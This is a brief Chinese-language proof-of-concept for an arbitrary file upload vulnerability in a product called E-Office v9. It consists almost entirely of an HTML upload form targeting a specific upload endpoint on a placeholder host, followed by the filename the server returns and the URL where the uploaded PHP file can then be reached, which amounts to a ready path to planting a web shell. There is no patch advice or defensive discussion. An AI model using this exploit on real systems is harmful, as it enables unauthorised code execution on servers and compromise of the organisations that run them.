某 E-Office v9 任意文件上传漏洞复现
POC
<form id="upload-form" action="http://xxxx.com/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo" method="post" enctype="multipart/form-data" > <input type="file" id="Filedata" name="Filedata" /> <br /> <input type="submit" value="Upload" /> </form>
上传成功会返回
logo-eoffice.php
访问URL;/images/logo/logo-eoffice.php